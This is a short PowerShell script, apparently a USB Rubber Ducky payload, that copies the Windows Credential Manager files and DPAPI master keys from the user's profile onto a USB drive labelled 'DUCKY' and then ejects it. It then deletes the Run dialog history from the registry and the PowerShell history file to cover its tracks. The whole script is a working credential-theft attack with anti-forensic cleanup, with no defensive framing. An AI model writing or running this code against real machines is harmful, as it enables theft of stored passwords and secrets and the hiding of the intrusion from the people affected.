# Variables
$drive = (Get-Volume -FileSystemLabel 'DUCKY').DriveLetter
$userProfile = $Env:UserProfile

# Get the credential files
$credentialFiles = Get-ChildItem -Force "${userProfile}\AppData\Local\Microsoft\Credentials\"
$i=1
$credentialFiles | ForEach-Object {
    $fileObj = $_
    # copy to ducky
    Copy-Item $fileObj.FullName "${drive}:\credential${i}"
    $i++
}
# Get the gUIDMasterKey
$protectFolder = (Get-ChildItem -Directory -Force "${userProfile}\AppData\Roaming\Microsoft\Protect\").FullName

# Copy master key to ducky
$index=1
Get-ChildItem -Force -Recurse $protectFolder | ForEach-Object {
    # $fileName = $_.Name
    $filePath = $_.FullName
    Copy-Item $filePath "${drive}:\key${index}"
}

# Eject
$driveEject = New-Object -ComObject Shell.Application
$driveEject.Namespace(17).ParseName("${drive}:").InvokeVerb("Eject")

# Cleanup traces

# Delete run box history
reg.exe delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f

# Delete Powershell history
Remove-Item (Get-PSreadlineOption).HistorySavePath

exit